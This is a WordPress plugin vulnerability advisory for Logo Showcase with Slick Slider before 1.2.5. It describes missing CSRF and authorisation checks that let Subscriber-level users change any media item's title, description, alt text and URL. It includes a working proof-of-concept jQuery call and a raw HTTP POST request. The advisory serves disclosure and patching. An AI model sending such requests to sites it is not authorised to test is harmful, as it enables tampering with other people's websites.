WordPress Plugin Vulnerabilities
Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update
Description
The plugin does not have CSRF and authorisation checks in the lswss_save_attachment_data AJAX action, allowing any authenticated users, such as Subscriber, to change title, description, alt text, and URL of arbitrary uploaded media.
Proof of Concept
jQuery.post(ajaxurl,{
action: "lswss_save_attachment_data",
attachment_id: 564,
form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20by%20subscriber&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Connection: close
Cookie: [any authenticated user]
action=lswss_save_attachment_data&attachment_id=2133&form_data=lswss_attachment_title%3DTest%26lswss_attachment_desc%3DChanged%2520by%2520subscriber%26lswss_attachment_alt%3DAlt%2520text%26lswss_attachment_link%3D
Affects Plugins
Fixed in 1.2.5 References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-24 (about 2 years ago)
Added
2022-01-31 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)
WPScan 